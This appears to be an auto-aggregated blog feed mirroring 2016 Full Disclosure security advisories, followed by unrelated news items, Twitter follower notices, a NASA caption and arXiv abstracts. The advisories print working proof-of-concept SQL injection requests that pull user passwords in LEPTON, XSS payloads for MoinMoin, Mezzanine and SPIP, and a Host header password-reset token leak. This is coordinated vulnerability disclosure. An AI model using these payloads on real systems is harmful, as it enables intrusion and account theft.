Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://ift.tt/2fLwZoM important-lepton-2.3.0-101.php Vendor Website: http://ift.tt/2g2ZQb7 Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to multiple SQL injections. The injections require a user account with elevated privileges. 3. Details SQL Injection: Search Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "terms" parameter of the page search is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken= 3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 154 search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search Blind or Error-based SQL Injection: Create Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "parent" parameter of the create page functionality is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken= dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()& visibility=public&submit=Add Blind or Error-based SQL Injection: Add Droplet CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "Add_droplets" parameter of the droplet permission manager is vulnerable to SQL injection. A user account with access to the Droplets administration tool is required. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets& leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid= f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool= droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute= 'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1& Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1& Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://ift.tt/2fLwOda Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2g30Agk

Source: Gmail -> IFTTT-> Blogger

[FD] MoinMoin 1.9.8: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MoinMoin 1.9.8 Fixed in: 1.9.9 Fixed Version Link: http://ift.tt/2faSzVx Vendor Website: https://moinmo.in Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode: Coordinated Release CVE: CVE-2016-7148, CVE-2016-7146 Credits Tim Coen of Curesec GmbH 2. Overview MoinMoin is an open source Wiki application written in python. In version 1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Persistent XSS (CVE-2016-7148) CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: A page name is echoed in the attach file page without encoding, leading to persistent XSS. Proof of Concept: To place the payload create a new page which contains the payload as name by visiting: http://localhost:9090/ newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit To trigger the payload visit the attach file page: http://localhost:9090/ newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile Note that there must be at least one existing attachment. XSS 2: Persistent XSS (CVE-2016-7146) CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The GUI editor is vulnerable to XSS via a specifically crafted URL, as it echoes part of the URL without encoding in two different places. The issue can be exploited reflected or persistent. Proof of Concept: Reflected example (the page does not have to exist): http://localhost:9090/'"> ?action=fckdialog&dialog=attachment Alternatively, an attacker can create a page containing the payload: http://localhost:9090/ newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E The payload is triggered when attaching a file via the the GUI editor ("Edit (GUI)" -> "Attachment"). 4. Solution To mitigate this issue please upgrade at least to version 1.9.9: http://ift.tt/2faSzVx Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs 09/06/2016 CVEs assigned and distributed to vendor 10/05/2016 Vendor requests more time 10/31/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2eTLMfq

Source: Gmail -> IFTTT-> Blogger

[FD] MyLittleForum 2.3.6.1: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: http://ift.tt/2g1R8X2 v2.3.7beta Vendor Website: http://ift.tt/10EIkYz Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to cross site request forgery. An attacker could exploit this issue to add new users or change the status of existing users to administrator if a victim visits a website containing a specifically crafted payload while logged into MyLittleForum. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description: There is no CSRF protection, allowing an attacker to perform actions for a victim if the victim visits an attacker controlled website while logged in. Proof of Concept: Add New User:
</ html> Make Existing User Admin:
4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: http://ift.tt/2fnqDvi Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2g1P3u7

Source: Gmail -> IFTTT-> Blogger

[FD] Mezzanine 4.2.0: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Mezzanine 4.2.0 Fixed in: 4.2.1 Fixed Version Link: http://ift.tt/2gpyLk6 Vendor Website: http://ift.tt/AbtAFJ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Mezzanine is an open source CMS written in python. In version 4.2.0, it is vulnerable to two persistent XSS attacks, one of which requires extended privileges, the other one does not. These issues allow an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Persistent XSS via Name in Comments CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When leaving a comment on a blog post, the author name is echoed unencoded in the backend, leading to persistent XSS. Proof of Concept: Leave a comment, as author name use '"> To trigger the payload, view the comment overview in the admin backend: http:// localhost:8000/admin/generic/threadedcomment XSS 2: Persistent XSS via HTML file upload CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N Description: When uploading files via the media manager, the extension .html is allowed, leading to XSS via file upload. An account with the permissions to upload files to the media manager is required. Proof of Concept: Visit the media manager and upload a .html file: http://localhost:8000/admin/ media-library/upload/?ot=desc&o=date As uploaded files are stored inside the web root, it can now be accessed, thus executing the JavaScript code it contains: http://localhost:8000/static/media/uploads/xss.html 4. Solution To mitigate this issue please upgrade at least to version 4.2.1: http://ift.tt/2gpyLk6 Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/05/2016 Vendor replies 09/19/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2gpBxFI

Source: Gmail -> IFTTT-> Blogger

[FD] SPIP 3.1: XSS & Host Header Injection

Security Advisory - Curesec Research Team 1. Introduction Affected SPIP 3.1 Product: Fixed in: 3.1.2 / 3.0.23 Fixed Version http://ift.tt/2gpxw4o Link: Vendor Website: http://www.spip.net/ Vulnerability Reflected & Persistent XSS, Host Header Injection, httpOnly Type: Cookie disclosure Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview SPIP is a content management system written in PHP. In version 3.1, it is vulnerable to a persistent as well as reflected cross site scripting vulnerability as it allows users to enter URLs containing the JavaScript protocol, which an attacker can exploit to steal cookies, inject JavaScript keylogger, or bypass CSRF protection. Additionally, it contains a Host Header Injection which may lead to the leakage of password reset tokens and thus the compromisation of user accounts. Finally, the application discloses httpOnly cookies, making exploitation of XSS issues slightly easier. 3. Details Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: When posting a message in the internal Forum, user input is properly encoded, thus disallowing XSS. However, a hypertext link may be added as well, and there is no check on the protocol of the supplied link, which leads to an XSS vulnerability. Proof of Concept: 1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new 2. In the URL field enter: javascript:alert(1) 3. Post the Message To trigger the payload, a click on the link is required. Reflected XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: When editing a private message, a redirect parameter may be submitted as well. This parameter decides to what page a user is returned if they were to press the back button. The value of this parameter is user controlled and may thus be used for phishing or XSS attacks. Proof of Concept: Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect= javascript:alert(1) Click on the Back button represented by the envelope icon. Host Header Injection CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N Description: The application takes the Host Header and uses it in a password reset email. As the Host Header is user-controlled, an attacker can set it to arbitrary values. In the case of a password reset page, this can lead to security issues as an attacker can request a password reset email for a user and set the Host header to a server they control. As this header is used in the email, a user would be send to the attackers server if they were to click on the link, leading to the leakage of the recovery token and thus the compromisation of the account. Proof of Concept: Request: POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1 Host: example.com Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/ x-www-form-urlencoded Content-Length: 199 page=spip_pass&lang=en& formulaire_action=oubli&formulaire_action_args= orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk &oubli=visitor%40example.com&nobot= Email Send: [My SPIP site] Forgotten password (this is an automated message) To recover your access to the site My SPIP site (http://localhost/spip) Please go to the following address: http:// http://ift.tt/2g2TCG0 You can then enter a new password and log in to the site. httpOnly Cookie Disclosure Description: The phpinfo page discloses httpOnly cookies such as session cookies, making it slightly easier to exploit XSS vulnerabilities. Proof of Concept: http://localhost/spip/ecrire/?exec=info 4. Solution To mitigate this issue please upgrade at least to version 3.1.2: http://ift.tt/2gpxw4o Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/23/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2g2XTsP

Source: Gmail -> IFTTT-> Blogger

[FD] MyLittleForum 2.3.6.1: XSS & RPO

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: http://ift.tt/2g1R8X2 v2.3.7beta Vendor Website: http://ift.tt/10EIkYz Vulnerability Type: XSS & RPO Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to reflected cross site scripting as well as relative path overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection, and RPO may lead to CSS injection. 3. Details Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The username and email parameter of the add user page are vulnerable to reflected XSS. Proof of Concept:
" />
</ html> Relative Path Overwrite Description: Because the application includes CSS files relative instead of absolute, an attacker can overwrite the path. With some browsers, this may lead to CSS injection. Proof of Concept: http://localhost/mylittleforum-2.3.6.1/index.php////?id=1 4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: http://ift.tt/2fnqDvi Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2eMWhGo

Source: Gmail -> IFTTT-> Blogger

[FD] Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the thirteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January. The below information is available in more detail on my blog at http://ift.tt/2g1LYKv. Follow me on http://twitter.com/berendjanwever for daily browser bugs. Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free ======================================================================= (The fix and CVE number for this issue are unknown) Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-2482 MSIE 8 jscript RegExpBase::FBadHeader use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the twelfth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January. The below information is available in more detail on my blog at http://ift.tt/2ffQrcO. Follow me on http://twitter.com/berendjanwever for daily browser bugs. MSIE 8 jscript RegExpBase::FBadHeader use-after-free ==================================================== (MS15-018, CVE-2015-2482) Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE request - Samsumg Mobile Phone SVE-2016-6343: Unauthorized API access via system service call

Hi, I'd like to request CVE for the following vulnerability fixed in NOV,2016. Fix: http://ift.tt/2fcgN2i Description of the security vulnerability: Severity: Medium Affected versions: M(6.0) Reported on: May 26, 2016 Disclosure status: Privately disclosed. The vulnerability allowing unauthorized access to system APIs from system service with improper access control enables attackers to control the device screen. The patch includes checks for access control. Best Regards, 0xr0ot(行之)

Source: Gmail -> IFTTT-> Blogger

[FD] Reason Core Security v1.2.0.1 - Unqoted Path Privilege Escalation Vulnerability

Document Title: =============== Reason Core Security v1.2.0.1 - Unqoted Path Privilege Escalation Vulnerability References (Source): ==================== http://ift.tt/2ewOpZi Release Date: ============= 2016-11-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2003 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== Reason Core Security is an anti-malware program designed by developers HerdProtect. This program is intended for use with your existing antivirus software and acts as a second layer of defense in the event that the malware slips past the real-time protection of your antivirus program. (Copy of the Vendor Homepage: http://ift.tt/1PR6CKZ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an unquoted service path privilege escalate vulnerability in the Reason Core Security anti-virus software. Vulnerability Disclosure Timeline: ================================== 2016-11-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== HerdProtect Product: Reason Core Security - Software 1.2.0.1 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ The application suffers from an unquoted search path issue in the official Reason Core Security v1.2.0.1 anti-virus software. The issue allows authorized but unprivileged local users to execute arbitrary code with system privileges on the active system. The attack vector of the vulnerability is local. Proof of Concept (PoC): ======================= The issue can be exploited by local attackers with restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. -- PoC Exploitation

Source: Gmail -> IFTTT-> Blogger

[FD] EditMe CMS - CSRF Privilege Escalate Web Vulnerability

Document Title: =============== EditMe CMS - CSRF Privilege Escalate Web Vulnerability References (Source): ==================== http://ift.tt/2eWQf4t Release Date: ============= 2016-11-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1996 Common Vulnerability Scoring System: ==================================== 2.8 Product & Service Introduction: =============================== EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS. CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear. (Copy of the Vendor Homepage: http://www.editme.com/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system. Vulnerability Disclosure Timeline: ================================== 2016-11-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A cross site request forgery vulnerability has been discovered in the official EditMe content managament system. The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions with own web context. In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain unauthorized access to the administrator access privileges. Proof of Concept (PoC): ======================= Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction. To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided.

Source: Gmail -> IFTTT-> Blogger

3 Mobile UK Hacked – 6 Million Customers' Private Data at risk

Three, one of UK's biggest mobile operators, has become the latest victim of a massive data breach that reportedly left the personal information and contact details of 6 Million of its customers exposed. The company admitted the data breach late Thursday, saying that computer hackers gained access to a Three Mobile customer phone upgrade database containing the account details of nearly 6


from The Hacker News http://ift.tt/2faOgcP
via IFTTT

[FD] Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability

Document Title: =============== Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability References (Source): ==================== http://ift.tt/2fClouO Release Date: ============= 2016-11-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1999 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== While there are a number of technical reasons that highlight the differences and advantages Habari has over other blogging packages, a major component of what makes Habari different is its community participation model. (Copy of the Homepage: http://ift.tt/2g4vH9t ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Habari v0.9.2 content management system. Vulnerability Disclosure Timeline: ================================== 2016-11-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Habari Product: Habari - Content Management System 0.9.2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official Habari CMS v0.9.2. The vulnerability allows remote attackers to inject own malicious script code on the application-side of affected web modules or service function. The persistent cross site scripting web vulnerability is located in the `name` parameter of the `comments` module. Remote attackers without privileged web-application user accounts are able to inject malcious script code to the comments backend. Thus allows remote attackers to execute script code on preview of the comments section for administrators in the application backend. The attack vector of the issue is persistent and the request method to inject the malicious comments is POST. The vulnerability is a classic cross site scripting issue that affects the backend to compromise administrator accounts. The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the web vulnerability requires no privileged web-application user account and only low user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Feedback - Comments Vulnerable Parameter(s): [+] comment_name Affected Module(s): [+] Backend - Comments Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the application with an article 2. Write a comment and include as name to the comment a script code payload 3. Save to submit via POST method request Note: Now the attacker awaits the admin watches the comments 4. The malicious script code payload executes on visit of the comments module in the backend 5. Successful reproduce of the remote vulnerability! Injection Point: http://ift.tt/2fCkkqK Execution Point: http://ift.tt/2g4AlnO PoC: Exploitation (comment_name)

<[PAYLOAD EXECUTION VIA NAME OF THE COMMENTS INPUT!]>

test message by pentester

2016-11-05 8:05 pm



Source: Gmail -> IFTTT-> Blogger

[FD] Apple iOS 10.1 - Multiple Access Permission Vulnerabilities

iPhone Secretly Sends Your Call History to Apple Even If iCloud Backups are Turned Off

In the fight against encryption, Apple has positioned itself as a staunch defender of its user privacy by refusing the federal officials to provide encryption backdoors into its products, as well as implementing better encryption for its products. However, a new report from a security firm suggests Apple's online syncing service iCloud secretly stores logs of its users' private information


from The Hacker News http://ift.tt/2gmxDwN
via IFTTT

I have a new follower on Twitter


TotalTrax, Inc.
TotalTrax, Inc. is the leading provider of real time vehicle, driver, impact and inventory tracking technologies.
Newport, De
http://t.co/1tXqddlDJ4
Following: 769 - Followers: 1287

November 18, 2016 at 01:30AM via Twitter http://twitter.com/TotalTrax

Soyuz vs Supermoon


Faster than a speeding bullet, more powerful than a locomotive, and able to leap tall buildings in a single bound, this Soyuz rocket stands on the launch pad at Baikonur Cosmodrome in Kazakhstan on November 14. Beyond it rises a supermoon, but fame for exceptional feats of speed, strength, and agility is not the reason November's Full Moon was given this popular name. Instead, whenever a Full Moon shines near perigee, the closest point in its elliptical orbit around Earth, it appears larger and brighter than other more distant Full Moons, and so a supermoon is born. In fact, November's supermoon was the second of three consecutive supermoons in 2016. It was also the closest and most superest Full Moon since 1948. Meanwhile, the mild mannered Soyuz rocket is scheduled to launch its Expedition 50/51 crew to the International Space Station today, November 17. via NASA http://ift.tt/2fZbGzn

Thursday, November 17, 2016

I have a new follower on Twitter


Richard Perry
I show people who want to make a difference 🌎 how to walk their talk with purpose & power. And I give awesome high fives! Grab Your FREE eBook📚 + Training🔽🔽
Wilkes-Barre, PA
https://t.co/IWnBpP8KKt
Following: 4509 - Followers: 5906

November 17, 2016 at 11:05PM via Twitter http://twitter.com/ThePathOfMe

I have a new follower on Twitter


Richard W Newton
Speaker, Founder & MD at @freshlearninghq. Adventurous Business Traveler | Conferenciante, Fundador y DG de https://t.co/OJulUeaZR5 | Tweets: EN/ES
tbc
https://t.co/tJteTQ6HUP
Following: 15476 - Followers: 17381

November 17, 2016 at 10:40PM via Twitter http://twitter.com/richardwnewton

I have a new follower on Twitter


Charles
Consultant to 400+ Businesses In The Past 15yrs | Founder/CEO | Big Ideas | Macro Solutions | VC | Think Beyond Your Own Lifetime | Yes, I'm Wearing Black Again
United States
https://t.co/j4ia3ZSJ44
Following: 18913 - Followers: 61778

November 17, 2016 at 09:35PM via Twitter http://twitter.com/WishExist

Explicable Robot Planning as Minimizing Distance from Expected Behavior. (arXiv:1611.05497v1 [cs.AI])

In order for robots to be integrated effectively into human work-flows, it is not enough to address the question of autonomy but also how their actions or plans are being perceived by their human counterparts. When robots generate task plans without such considerations, they may often demonstrate what we refer to as inexplicable behavior from the point of view of humans who may be observing it. This problem arises due to the human observer's partial or inaccurate understanding of the robot's deliberative process and/or the model (i.e. capabilities of the robot) that informs it. This may have serious implications on the human-robot work-space, from increased cognitive load and reduced trust in the robot from the human, to more serious concerns of safety in human-robot interactions. In this paper, we propose to address this issue by learning a distance function that can accurately model the notion of explicability, and develop an anytime search algorithm that can use this measure in its search process to come up with progressively explicable plans. As the first step, robot plans are evaluated by human subjects based on how explicable they perceive the plan to be, and a scoring function called explicability distance based on the different plan distance measures is learned. We then use this explicability distance as a heuristic to guide our search in order to generate explicable robot plans, by minimizing the plan distances between the robot's plan and the human's expected plans. We conduct our experiments in a toy autonomous car domain, and provide empirical evaluations that demonstrate the usefulness of the approach in making the planning process of an autonomous agent conform to human expectations.



from cs.AI updates on arXiv.org http://ift.tt/2fBqjvP
via IFTTT

Zero-Shot Visual Question Answering. (arXiv:1611.05546v1 [cs.CV])

Part of the appeal of Visual Question Answering (VQA) is its promise to answer new questions about previously unseen images. Most current methods demand training questions that illustrate every possible concept, and will therefore never achieve this capability, since the volume of required training data would be prohibitive. Answering general questions about images requires methods capable of Zero-Shot VQA, that is, methods able to answer questions beyond the scope of the training questions. We propose a new evaluation protocol for VQA methods which measures their ability to perform Zero-Shot VQA, and in doing so highlights significant practical deficiencies of current approaches, some of which are masked by the biases in current datasets. We propose and evaluate several strategies for achieving Zero-Shot VQA, including methods based on pretrained word embeddings, object classifiers with semantic embeddings, and test-time retrieval of example images. Our extensive experiments are intended to serve as baselines for Zero-Shot VQA, and they also achieve state-of-the-art performance in the standard VQA evaluation setting.



from cs.AI updates on arXiv.org http://ift.tt/2g3FKLP
via IFTTT

Stream Packing for Asynchronous Multi-Context Systems using ASP. (arXiv:1611.05640v1 [cs.LO])

When a processing unit relies on data from external streams, we may face the problem that the stream data needs to be rearranged in a way that allows the unit to perform its task(s). On arrival of new data, we must decide whether there is sufficient information available to start processing or whether to wait for more data. Furthermore, we need to ensure that the data meets the input specification of the processing step. In the case of multiple input streams it is also necessary to coordinate which data from which incoming stream should form the input of the next process instantiation. In this work, we propose a declarative approach as an interface between multiple streams and a processing unit. The idea is to specify via answer-set programming how to arrange incoming data in packages that are suitable as input for subsequent processing. Our approach is intended for use in asynchronous multi-context systems (aMCSs), a recently proposed framework for loose coupling of knowledge representation formalisms that allows for online reasoning in a dynamic environment. Contexts in aMCSs process data streams from external sources and other contexts.



from cs.AI updates on arXiv.org http://ift.tt/2fBn1sw
via IFTTT

Learning to detect and localize many objects from few examples. (arXiv:1611.05664v1 [cs.CV])

The current trend in object detection and localization is to learn predictions with high capacity deep neural networks trained on a very large amount of annotated data and using a high amount of processing power. In this work, we propose a new neural model which directly predicts bounding box coordinates. The particularity of our contribution lies in the local computations of predictions with a new form of local parameter sharing which keeps the overall amount of trainable parameters low. Key components of the model are spatial 2D-LSTM recurrent layers which convey contextual information between the regions of the image. We show that this model is more powerful than the state of the art in applications where training data is not as abundant as in the classical configuration of natural images and Imagenet/Pascal VOC tasks. We particularly target the detection of text in document images, but our method is not limited to this setting. The proposed model also facilitates the detection of many objects in a single image and can deal with inputs of variable sizes without resizing.



from cs.AI updates on arXiv.org http://ift.tt/2g3A1Gb
via IFTTT

Study on Feature Subspace of Archetypal Emotions for Speech Emotion Recognition. (arXiv:1611.05675v1 [cs.LG])

Feature subspace selection is an important part in speech emotion recognition. Most of the studies are devoted to finding a feature subspace for representing all emotions. However, some studies have indicated that the features associated with different emotions are not exactly the same. Hence, traditional methods may fail to distinguish some of the emotions with just one global feature subspace. In this work, we propose a new divide and conquer idea to solve the problem. First, the feature subspaces are constructed for all the combinations of every two different emotions (emotion-pair). Bi-classifiers are then trained on these feature subspaces respectively. The final emotion recognition result is derived by the voting and competition method. Experimental results demonstrate that the proposed method can get better results than the traditional multi-classification method.



from cs.AI updates on arXiv.org http://ift.tt/2fBhToj
via IFTTT

Optimal Dynamic Coverage Infrastructure for Large-Scale Fleets of Reconnaissance UAVs. (arXiv:1611.05735v1 [cs.AI])

Current state of the art in the field of UAV activation relies solely on human operators for the design and adaptation of the drones' flying routes. Furthermore, this is being done today on an individual level (one vehicle per operators), with some exceptions of a handful of new systems, that are comprised of a small number of self-organizing swarms, manually guided by a human operator.

Drones-based monitoring is of great importance in variety of civilian domains, such as road safety, homeland security, and even environmental control. In its military aspect, efficiently detecting evading targets by a fleet of unmanned drones has an ever increasing impact on the ability of modern armies to engage in warfare. The latter is true both traditional symmetric conflicts among armies as well as asymmetric ones. Be it a speeding driver, a polluting trailer or a covert convoy, the basic challenge remains the same -- how can its detection probability be maximized using as little number of drones as possible.

In this work we propose a novel approach for the optimization of large scale swarms of reconnaissance drones -- capable of producing on-demand optimal coverage strategies for any given search scenario. Given an estimation cost of the threat's potential damages, as well as types of monitoring drones available and their comparative performance, our proposed method generates an analytically provable strategy, stating the optimal number and types of drones to be deployed, in order to cost-efficiently monitor a pre-defined region for targets maneuvering using a given roads networks.

We demonstrate our model using a unique dataset of the Israeli transportation network, on which different deployment schemes for drones deployment are evaluated.



from cs.AI updates on arXiv.org http://ift.tt/2g3DS5Y
via IFTTT

Fast Non-Parametric Tests of Relative Dependency and Similarity. (arXiv:1611.05740v1 [cs.AI])

We introduce two novel non-parametric statistical hypothesis tests. The first test, called the relative test of dependency, enables us to determine whether one source variable is significantly more dependent on a first target variable or a second. Dependence is measured via the Hilbert-Schmidt Independence Criterion (HSIC). The second test, called the relative test of similarity, is use to determine which of the two samples from arbitrary distributions is significantly closer to a reference sample of interest and the relative measure of similarity is based on the Maximum Mean Discrepancy (MMD). To construct these tests, we have used as our test statistics the difference of HSIC statistics and of MMD statistics, respectively. The resulting tests are consistent and unbiased, and have favorable convergence properties. The effectiveness of the relative dependency test is demonstrated on several real-world problems: we identify languages groups from a multilingual parallel corpus, and we show that tumor location is more dependent on gene expression than chromosome imbalance. We also demonstrate the performance of the relative test of similarity over a broad selection of model comparisons problems in deep generative models.



from cs.AI updates on arXiv.org http://ift.tt/2fBfYQy
via IFTTT

